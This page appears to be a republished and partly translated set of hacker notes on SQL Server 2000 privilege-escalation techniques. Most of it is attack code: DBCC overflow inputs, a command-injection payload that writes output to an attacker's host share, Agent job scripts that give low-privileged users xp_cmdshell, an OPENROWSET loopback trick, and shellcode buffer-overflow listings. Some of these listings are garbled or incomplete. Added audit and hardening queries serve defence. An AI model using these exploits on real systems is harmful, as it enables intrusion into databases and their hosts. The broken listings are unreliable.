Microsoft SQL Server public exploitation

Source: Internet
Author: User

Hacker notes

Note: these are very old techniques, mainly of use when testing SQL Server 2000; they are largely ineffective against SQL Server 2005.
1. xp_runwebtask / msdb.dbo.mswebtasks
The msdb.dbo.mswebtasks table grants the PUBLIC role INSERT, UPDATE, DELETE and SELECT on it.

Any attacker who passes SQL Server authentication can therefore delete, insert or update web tasks created by other users, and can run existing web tasks (xp_runwebtask) to perform arbitrary operations through them.
Because a web task runs with the permissions of the SQL Server Agent service account, this may be used to execute arbitrary OS commands or to escalate to membership of the sysadmin role.
2. DBCC buffer overflows
Several DBCC commands do not bounds-check their user-supplied parameters. Passing an overlong string as a parameter to any of the following can overflow a buffer,
and a process that uses the SQL Server Agent proxy account can then execute arbitrary commands on the system:
dbcc addextendedproc ('xp_storedproc', 'XXX...')   (a)
dbcc indexfrag ('', 'XXX...')                      (b)
dbcc updateusage ('', 'XXX...')                    (c)
dbcc checkconstraints ('XXX...')                   (c)
dbcc showcontig ('XXX...')                         (d)
dbcc cleantable ('', 'XXX...')                     (d)
(a) Only members of the sysadmin fixed server role can run this command.
(b) Only members of the sysadmin fixed server role or of the db_owner or db_ddladmin fixed database roles can run this command.
(c) Only members of the sysadmin fixed server role or of the db_owner fixed database role can run this command.
(d) Any user can run this command.
Only the (d) commands matter for escalation from a low-privileged login; the others already require elevated rights just to reach the vulnerable code.
3.
The storage process Sp_MScopyscriptfile in Microsoft SQL Server does not properly filter user-submitted parameters. Remote attackers can exploit this vulnerability
Server Agent Proxy account permission to execute arbitrary commands on the system.
Sp_MScopyscriptfile: You can create a directory in the copy directory of the SQL Server and copy the script to the directory. The Stored Procedure contains the @ scriptfile input parameter
To copy the name of the script file, the Sp_MScopyscriptfile stored procedure does not properly filter the externally provided parameters. Remote attackers can insert the Operating System
Execute the command through xp_cmdshell. If the SQL Server Agent Proxy account is stored in the system, attackers can use the permissions of the SQL Server Agent Proxy account
But the default SQL Server Agent Proxy account requires the SQL administrator privilege to activate it.

Declare @ command varchar (100)
Declare @ scripfile varchar (200)
Set concat_null_yields_null off
Select @ command = dir c:>
"\ Attackerip1_dir.txt"
Select @ scripfile = c: autoexec. bat> nul "| +
@ Command + | rd"
Exec sp_MScopyscriptfile @ scripfile,
4. sp_replwritetovarbin() heap overflow
Microsoft SQL Server sp_replwritetovarbin() heap overflow exploit (CVE-2008-5416, fixed by MS09-004). Unlike the rest of this list it affects SQL Server 2005 as well as 2000; the interim workaround was to deny EXECUTE on sp_replwritetovarbin to public.
http://hi.baidu.com/hack_forensic/blog/item/be1ea0142951b75bf3de32d9.html
5. sp_add_job / sp_add_jobstep (SQL Server Agent jobs)
A login that can create jobs in msdb can have the SQL Server Agent run T-SQL on its behalf over the Agent's own connection. The job step below wraps xp_cmdshell inside xp_execresultset (see item 7), and @delete_level = 1 makes the job remove itself once it has run successfully. Replace SERVER_NAME with the name of the target instance.
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
    @enabled = 1,
    @description = 'This will give a low privileged user access to xp_cmdshell',
    @delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
    @step_name = 'Exec my sql',
    @subsystem = 'TSQL',
    @command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''', N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
    @server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'
6. Arbitrary file creation through a job output file
The same job mechanism with @output_file_name writes the step's result set to a path of the attacker's choosing, with the Agent's file-system permissions:
USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFileCreate',
    @enabled = 1,
    @description = 'This will create a file called c:\sqlafc123.txt',
    @delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',
    @step_name = 'SQLAFC',
    @subsystem = 'TSQL',
    @command = 'select ''hello, this file was created by the SQL Agent.''',
    @output_file_name = 'c:\sqlafc123.txt'
EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',
    @server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'ArbitraryFileCreate'
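The two jobs above leave a recognisable shape in msdb while they exist. The query below is an added example written for this page, not code from the original note or from Microsoft; it assumes the SQL Server 2000 msdb tables sysjobs and sysjobsteps and a sysadmin login, and the LIKE patterns are simply the procedures used elsewhere on this page.

```sql
-- Added example: inventory Agent jobs that look like the GetSystemOnSQL / ArbitraryFileCreate
-- jobs above. Assumes SQL Server 2000 msdb.dbo.sysjobs and msdb.dbo.sysjobsteps.
USE msdb
GO
SELECT j.name                                                  AS job_name,
       SUSER_SNAME(j.owner_sid)                                AS owner_login,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(j.owner_sid))  AS owner_is_sysadmin,
       j.delete_level,        -- 1 = delete itself on success, as both jobs above set
       s.step_id,
       s.subsystem,
       s.output_file_name,    -- set by the file-writing job above
       s.command
FROM sysjobs j
JOIN sysjobsteps s ON s.job_id = j.job_id
WHERE s.command LIKE '%xp_cmdshell%'
   OR s.command LIKE '%xp_execresultset%'
   OR s.command LIKE '%xp_displayparamstmt%'
   OR s.command LIKE '%xp_printstatements%'
   OR s.command LIKE '%openrowset%'
   OR s.output_file_name IS NOT NULL                               -- step writes a file
   OR j.delete_level <> 0                                          -- self-deleting job
   OR SUSER_SNAME(j.owner_sid) IS NULL                             -- owner login no longer exists
   OR IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(j.owner_sid)) = 0   -- owned by a non-sysadmin
ORDER BY j.name, s.step_id
GO
```

Because @delete_level = 1 makes the Agent drop the job (history included, which is sp_delete_job's default) as soon as it succeeds, a job of this shape is only visible in msdb between creation and completion. Afterwards what remains is the output file it wrote and whatever the Agent log recorded, so treat an empty result as "nothing is scheduled right now", not as "nothing ran".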
7. xp_execresultset, xp_printstatements, xp_displayparamstmt
These three extended stored procedures take a T-SQL string (and a database name) and execute it, so any login allowed to call them can have them run xp_cmdshell on its behalf:
exec xp_displayparamstmt N'exec master..xp_cmdshell "dir > c:\esp-results.txt"', N'master', 1
8. xp_peekqueue (stack overflow)
The xp_peekqueue extended stored procedure does not bounds-check its first argument. The listing below, reconstructed from the garbled original, overruns the buffer with a long run of padding, overwrites the saved return address (@sra) with an address chosen for the detected Windows 2000 service pack, and appends a small stub that calls WinExec on @command and then ExitThread. Only the Service Pack 2 addresses were ever filled in; the other branches still carry the original "need to get address" placeholders, and the command string itself did not survive in the source.
declare @query varchar(4000)
declare @end_query varchar(500)
declare @short_jump varchar(8)
declare @sra varchar(8)
declare @call_eax varchar(4)
declare @WinExec varchar(8)
declare @mov varchar(4)
declare @ExitThread varchar(8)
declare @exploit_code varchar(200)
declare @command varchar(300)
declare @msver nvarchar(200)
declare @ver int
declare @sp nvarchar(20)

-- The command handed to WinExec. The string is missing from the source listing;
-- only its terminating null byte is visible there.
select @command = '' + char(0)

-- Work out the Windows 2000 service pack from the tail of @@version
-- ("... Service Pack 2)" followed by a newline), since the addresses are SP-specific.
select @sp = N'Service Pack'
select @msver = @@version
select @ver = ascii(substring(reverse(@msver), 3, 1))
if @ver = 53
    print @sp + char(@ver) -- Windows 2000 SP5, for when it comes out
else if @ver = 52
    print @sp + char(@ver) -- Windows 2000 SP4, for when it comes out
else if @ver = 51
    print @sp + char(@ver) -- Windows 2000 SP3, for when it comes out
else if @ver = 50 -- Windows 2000 Service Pack 2
begin
    print @sp + char(@ver)
    select @sra = 0x43E5E677        -- saved return address, little-endian
    select @WinExec = 0xAFA7E977    -- kernel32!WinExec
    select @ExitThread = 0xE275E877 -- kernel32!ExitThread
end
else if @ver = 49 -- Windows 2000 Service Pack 1
begin
    select @sra = 0x00000000        -- need to get address
    select @WinExec = 0x00000000    -- need to get address
    select @ExitThread = 0x00000000 -- need to get address
end
else -- no Windows 2000 service pack
begin
    select @sra = 0x00000000        -- need to get address
    select @WinExec = 0x00000000    -- need to get address
    select @ExitThread = 0x00000000 -- need to get address
end

-- Build the overlong first argument: the padding (the 948-character run of '1' in the
-- original listing) followed by AAAABBBB...ZZZZ, which reaches the saved return address.
select @query = 'exec xp_peekqueue ''' + replicate('1', 948)
    + 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ'
select @end_query = ''', ''a'''
select @short_jump = 0xEB0A9090     -- jmp short +10; nop; nop
select @mov = 0xB8                  -- mov eax, imm32
-- nop sled; push ebp; mov ebp,esp; xor eax,eax; push eax; lea eax,[ebx+2Ah]; push eax; mov eax, <WinExec>
select @exploit_code = 0x90909090909090909090558BEC33C0508D432A50B8
select @call_eax = 0xFFD0           -- call eax

-- Assigning the 0x... constants to varchar variables keeps them as raw bytes, so the
-- concatenation below places return address, stub, WinExec(@command, 0) and ExitThread
-- in the overflowing argument.
select @query = @query + @short_jump + @sra + @exploit_code + @WinExec + @call_eax
    + @mov + @ExitThread + @call_eax + @command + @end_query
exec (@query)
9. OPENROWSET
OPENROWSET can open a second, loopback connection to the same server. With Trusted_Connection=Yes that connection authenticates as the Windows account the SQL Server service runs under, which is normally a sysadmin login, so whatever is sent over it runs with full privileges no matter what the calling login has. The SET FMTONLY OFF prefix is needed because OPENROWSET first asks the provider only for result-set metadata, which would otherwise not execute the batch:
SELECT * FROM OPENROWSET('SQLOLEDB', 'Trusted_Connection=Yes;Data Source=myserver',
    'SET FMTONLY OFF EXECUTE master..xp_cmdshell "dir c:\"')
On SQL Server 2000 this is shut off by setting the DisallowAdHocAccess value to 1 under HKLM\SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB, which limits ad hoc OPENROWSET/OPENDATASOURCE use through that provider to sysadmin members.

10. pwdencrypt (overflow)
The undocumented pwdencrypt() function overflows on an overlong Unicode argument. The listing has the same shape as the xp_peekqueue one (service-pack detection, then per-SP addresses), but the source cuts it off at the Service Pack 1 branch and the command string is missing, so only the surviving part is reproduced here:
declare @msver nvarchar(200)
declare @ver int
declare @sp nvarchar(20)
declare @call_eax nvarchar(8)
declare @exploit nvarchar(2000)
declare @padding nvarchar(200)
declare @exploit_code nvarchar(1000)
declare @sra nvarchar(8)
declare @short_jump nvarchar(8)
declare @a_bit_more_pad nvarchar(16)
declare @WinExec nvarchar(16)
declare @command nvarchar(300)

-- The command string is missing from the source listing; only its null terminator survives.
select @command = N'' + nchar(0)

select @sp = N'Service Pack'
select @msver = @@version
select @ver = ascii(substring(reverse(@msver), 3, 1))
if @ver = 53
    print @sp + char(@ver) -- Windows 2000 SP5, for when it comes out
else if @ver = 52
    print @sp + char(@ver) -- Windows 2000 SP4, for when it comes out
else if @ver = 51
    print @sp + char(@ver) -- Windows 2000 SP3, for when it comes out
else if @ver = 50 -- Windows 2000 Service Pack 2
begin
    print @sp + char(@ver)
    select @sra = 0x2B49E277     -- saved return address for SP2, little-endian
    select @WinExec = 0xAFA7E977 -- kernel32!WinExec
end
else if @ver = 49 -- Windows 2000 Service Pack 1
-- (the source listing ends here; the SP1 branch, the padding and shellcode assembly,
--  and the call to pwdencrypt are not on the page)
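Every entry above except the DBCC commands and pwdencrypt comes down to an object that PUBLIC can reach: EXECUTE on an extended or replication procedure (items 3, 4, 7, 8) or DML on msdb.dbo.mswebtasks (item 1). The audit below is an added example written for this page, not code from the original note or from Microsoft; it assumes the SQL Server 2000 system tables sysobjects and sysprotects (where uid 0 is public), a sysadmin login, and the object list as given on this page. pwdencrypt() is a built-in function rather than a catalog object, so it has nothing to revoke and is only fixed by patching.

```sql
-- Added example: which of the objects this page abuses can PUBLIC still use on a
-- SQL Server 2000 instance, and close them off. Assumes SQL 2000 system tables.
USE master
GO
CREATE TABLE #wanted (db sysname, obj sysname, act int, act_name varchar(10))
-- sysprotects.action codes: 193 SELECT, 195 INSERT, 196 DELETE, 197 UPDATE, 224 EXECUTE
INSERT #wanted VALUES ('master', 'xp_cmdshell',          224, 'EXECUTE')
INSERT #wanted VALUES ('master', 'xp_runwebtask',        224, 'EXECUTE')
INSERT #wanted VALUES ('master', 'sp_MScopyscriptfile',  224, 'EXECUTE')
INSERT #wanted VALUES ('master', 'sp_replwritetovarbin', 224, 'EXECUTE')
INSERT #wanted VALUES ('master', 'xp_execresultset',     224, 'EXECUTE')
INSERT #wanted VALUES ('master', 'xp_printstatements',   224, 'EXECUTE')
INSERT #wanted VALUES ('master', 'xp_displayparamstmt',  224, 'EXECUTE')
INSERT #wanted VALUES ('master', 'xp_peekqueue',         224, 'EXECUTE')
INSERT #wanted VALUES ('msdb',   'mswebtasks',           195, 'INSERT')
INSERT #wanted VALUES ('msdb',   'mswebtasks',           196, 'DELETE')
INSERT #wanted VALUES ('msdb',   'mswebtasks',           197, 'UPDATE')

-- Snapshot both catalogs: every object, plus any permission row PUBLIC (uid 0) holds on it.
CREATE TABLE #have (db sysname, obj sysname, act int NULL, protecttype int NULL)
INSERT #have
SELECT 'master', o.name, p.action, p.protecttype
FROM master.dbo.sysobjects o
LEFT JOIN master.dbo.sysprotects p ON p.id = o.id AND p.uid = 0
INSERT #have
SELECT 'msdb', o.name, p.action, p.protecttype
FROM msdb.dbo.sysobjects o
LEFT JOIN msdb.dbo.sysprotects p ON p.id = o.id AND p.uid = 0

-- protecttype 206 is DENY; 204 and 205 are GRANT (with / without GRANT OPTION)
SELECT w.db, w.obj, w.act_name,
       CASE WHEN NOT EXISTS (SELECT 1 FROM #have h WHERE h.db = w.db AND h.obj = w.obj)
                 THEN 'object not present'
            WHEN NOT EXISTS (SELECT 1 FROM #have h WHERE h.db = w.db AND h.obj = w.obj AND h.act = w.act)
                 THEN 'no explicit grant to public'
            WHEN EXISTS (SELECT 1 FROM #have h WHERE h.db = w.db AND h.obj = w.obj
                                                AND h.act = w.act AND h.protecttype = 206)
                 THEN 'DENIED to public'
            ELSE 'GRANTED to public' END AS public_state
FROM #wanted w
ORDER BY w.db, w.obj, w.act_name
DROP TABLE #wanted
DROP TABLE #have
GO

-- Hardening. DENY wins over any GRANT that role membership might bring in, which is why
-- the pre-patch workaround for sp_replwritetovarbin (MS09-004) was a DENY rather than a
-- REVOKE. Check first whether anything legitimate (replication agents, web tasks) runs as
-- a non-sysadmin login, since it loses access too. A statement fails on an absent object.
DENY EXECUTE ON xp_cmdshell          TO public
DENY EXECUTE ON xp_runwebtask        TO public
DENY EXECUTE ON sp_MScopyscriptfile  TO public
DENY EXECUTE ON sp_replwritetovarbin TO public
DENY EXECUTE ON xp_execresultset     TO public
DENY EXECUTE ON xp_printstatements   TO public
DENY EXECUTE ON xp_displayparamstmt  TO public
DENY EXECUTE ON xp_peekqueue         TO public
GO
USE msdb
GO
REVOKE INSERT, UPDATE, DELETE ON mswebtasks FROM public
GO
```

Run the audit half first and keep its output; the hardening half is only a stopgap, because the overflows in items 2, 8 and 10 are only removed by the service packs and hotfixes, not by permissions.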

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.
